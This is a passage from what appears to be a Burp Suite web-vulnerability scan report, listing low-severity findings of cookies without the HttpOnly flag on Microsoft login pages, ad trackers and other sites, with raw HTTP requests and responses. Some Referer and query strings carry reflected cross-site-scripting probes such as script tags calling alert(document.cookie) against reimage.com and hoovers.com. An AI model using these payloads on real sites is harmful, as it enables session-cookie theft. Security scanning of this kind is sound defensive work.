X-Frame-Options: deny
Content-Length: 11416

<!-- ServerInfo: BAYIDSLGN1H36 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

17.297. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1
X-Frame-Options: deny
Content-Length: 11450

<!-- ServerInfo: BAYIDSLGN1H52 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

17.298. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11444

<!-- ServerInfo: BAYIDSLGN1H45 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

17.299. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:17 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
Content-Length: 1188

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

17.300. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

17.301. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Content-Length: 13160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...

17.302. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAADAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NAwAAABMAAADb3ydNut8nTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 30 Jan 2011 14:50:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?dcsredirect=124&dcstlh=0&dcstlv=0&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAAEAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NzQAAAM16RU3NekVNAwAAABMAAADNekVNzXpFTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


17.303. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23189;evt=16009;cat1=19307;cat2=19308;rand=85918057 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; pjw=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; adv_ic=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; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=AQAAAAEAAIAAAZVagAdAAANsSwAA; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

GIF89a.............!.......,...........D..;

17.304. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hoovers.com
Path:   /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.hoovers.com
Proxy-Connection: keep-alive
Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:54:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/
Location: http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&pccr=true&vidn=26A26274851D2CD5-60000130C044F459&&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:54:49 GMT
Last-Modified: Mon, 31 Jan 2011 01:54:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www334
Content-Length: 0
Content-Type: text/plain


17.305. http://michaelwann.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.306. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:12 GMT
Content-Length: 136393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.307. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.308. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 70397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.309. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.310. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:56 GMT
Content-Length: 43288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

17.311. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
